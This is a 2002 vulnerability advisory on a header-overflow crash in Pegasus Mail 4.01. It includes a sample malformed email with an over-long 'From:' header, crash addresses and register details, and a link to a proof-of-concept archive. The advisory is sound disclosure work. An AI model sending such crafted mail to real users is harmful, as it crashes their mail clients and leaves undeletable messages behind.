###################################################################### Luigi Auriemma Application: Pegasus mail (http://www.pmail.com) Version: 4.01 and possibly previous Bug: Bad management of "From:" and "To:" mail headers Date: 24 Jul 2002 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ###################################################################### Sections: 1) Introduction 2) Bug 3) The Code 4) Fix ###################################################################### =============== 1) Introduction =============== Pegasus mail seems to be a diffused free mail client for Windows (32 and 16 bit) and Dos. The version I have tested is the latest in this moment: 4.01 for Win32. The OS used for do the test is Win98SE (so something can differ a bit from who have NT/2K/XP or others) Naturally I have contacted all the supports mail addresses specified in the program but I have received no answers, so there is not official fix available. However this is not a big problem because an advisory is also useful for keep the attention of the vulnerable program's author. ###################################################################### ====== 2) Bug ====== The bug is in the management of the headers "From:" and "To:" that are in the mail received. Pegasus mail can manage only max 259 chars in these two fields, so the problem is when an attacker send some charaters more. For example, the following is a proof-of-concept mail: /*mail*/ From: myname <250'A's> To: test@localhost Subject: Good crash You cannot see this text 8-) /*end_mail*/ (the 260 chars are counted after "From:" so we have " myname <" + 250 'A's + ">" = 260, and with the "To:" header is identical) Now there are some different results about the crash of the program, and this seems caused by our activated program options. It can crash when we want to open the mail, or it will crash just when we want to check our mails and the great problem is when we reopen the client because the mail is cached in the user mail folder so the problem continue until he don't delete this bad mail. Another problem is that the malformed mail seems to be undeleteable from the program, because when you want to delete it from the trash Pegasus crash again. So after moved the mail in the trash, restart the program so it delete the mail automatically without crash. Now I want to show what are the errors (yes we get 2 errors, one after the other), and the different situation about the field we want to exploit: "From:" The first error happen when the EIP reach 0x004157c0 and the exploited header have filled EDX register. "To:" The first error happen when the EIP reach 0x004c668c and the exploited header have filled EAX and EDI registers. The second happen in Kernel32.dll at EIP 0xbffc04d4. ###################################################################### =========== 3) The Code =========== Download the Proof-of-concept from: http://aluigi.org/poc/pegasus.zip ###################################################################### ====== 4) Fix ====== See the Pegasus mail site (http://www.pmail.com) for updates. ######################################################################